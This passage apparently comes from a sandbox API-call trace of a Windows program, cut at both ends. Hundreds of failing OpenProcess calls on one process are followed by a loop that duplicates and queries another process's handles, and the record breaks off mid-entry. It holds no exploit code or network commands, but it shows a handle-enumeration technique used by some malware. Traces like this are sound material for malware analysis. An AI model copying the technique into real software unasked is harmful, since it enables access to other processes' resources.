dwProcessId=0x218) returned 0x0 [0113.242] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.242] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.242] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.242] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.242] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.242] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.242] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.242] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.242] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.242] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.242] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.242] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.243] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.243] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.243] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.243] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.243] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.243] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.243] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.243] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.243] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.243] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.243] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.243] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.243] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.243] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.243] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.243] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.243] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.243] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.243] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.243] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.243] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.243] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.243] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.243] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.243] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.243] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.243] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.243] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.243] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.243] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.243] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.244] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.245] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.245] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.245] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.245] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.245] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.245] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.245] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.245] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.245] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.245] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.245] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.245] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.245] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.245] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.245] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.245] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.245] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.245] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.245] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.245] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.245] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.245] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.245] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.245] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.245] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.245] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.245] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.245] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.245] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.245] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.245] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.245] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.245] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.245] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.245] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.246] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.246] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.246] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.246] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.246] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.246] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.246] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.246] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.246] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.246] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.246] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.246] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.246] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.246] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.246] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.246] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.246] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.246] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.246] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.246] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.246] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.246] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.246] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.246] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.246] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.246] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.246] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.246] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.246] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.246] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.246] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.246] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.246] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.246] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.246] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.246] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.247] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.247] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.247] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.247] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.247] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.247] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.247] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.247] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.247] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.247] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.247] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.247] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.247] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.247] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.247] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.247] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.247] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.247] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.247] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.247] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.247] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.247] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.247] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.247] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.247] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.247] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.247] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.247] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.247] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.247] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.247] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.247] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.247] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.247] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.248] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.248] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.248] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.248] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.248] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.248] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.248] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.248] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.248] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.248] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.248] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.248] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.248] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.248] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.248] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.248] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.248] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.248] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.248] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.248] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.248] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.248] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.248] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.248] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.248] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.248] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.248] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.248] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.248] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.248] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.248] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.248] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.248] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.248] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0113.248] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.249] GetTickCount () returned 0xe86374 [0113.249] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.249] GetTickCount () returned 0xe86374 [0113.249] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.249] GetTickCount () returned 0xe86374 [0113.249] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.249] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.249] GetTickCount () returned 0xe86374 [0113.249] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0113.249] GetTickCount () returned 0xe86374 [0113.249] CloseHandle (hObject=0x1b8) returned 1 [0113.249] GetTickCount () returned 0xe86374 [0113.249] CloseHandle (hObject=0x198) returned 1 [0113.249] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.249] GetTickCount () returned 0xe86374 [0113.250] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.250] GetTickCount () returned 0xe86374 [0113.250] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.250] GetTickCount () returned 0xe86374 [0113.250] GetTickCount () returned 0xe86374 [0113.250] CloseHandle (hObject=0x1b8) returned 1 [0113.250] GetTickCount () returned 0xe86374 [0113.250] CloseHandle (hObject=0x198) returned 1 [0113.250] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.250] GetTickCount () returned 0xe86374 [0113.250] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.250] GetTickCount () returned 0xe86374 [0113.250] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.250] GetTickCount () returned 0xe86374 [0113.251] GetTickCount () returned 0xe86374 [0113.251] CloseHandle (hObject=0x1b8) returned 1 [0113.251] GetTickCount () returned 0xe86374 [0113.251] CloseHandle (hObject=0x198) returned 1 [0113.251] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.251] GetTickCount () returned 0xe86374 [0113.251] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x10, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.251] GetTickCount () returned 0xe86374 [0113.251] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.251] GetTickCount () returned 0xe86374 [0113.251] GetTickCount () returned 0xe86374 [0113.251] CloseHandle (hObject=0x1b8) returned 1 [0113.252] GetTickCount () returned 0xe86374 [0113.252] CloseHandle (hObject=0x198) returned 1 [0113.252] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.252] GetTickCount () returned 0xe86374 [0113.252] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x14, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.252] GetTickCount () returned 0xe86374 [0113.252] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.252] GetTickCount () returned 0xe86374 [0113.252] GetTickCount () returned 0xe86374 [0113.252] CloseHandle (hObject=0x1b8) returned 1 [0113.252] GetTickCount () returned 0xe86374 [0113.252] CloseHandle (hObject=0x198) returned 1 [0113.252] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.252] GetTickCount () returned 0xe86374 [0113.253] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x18, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: 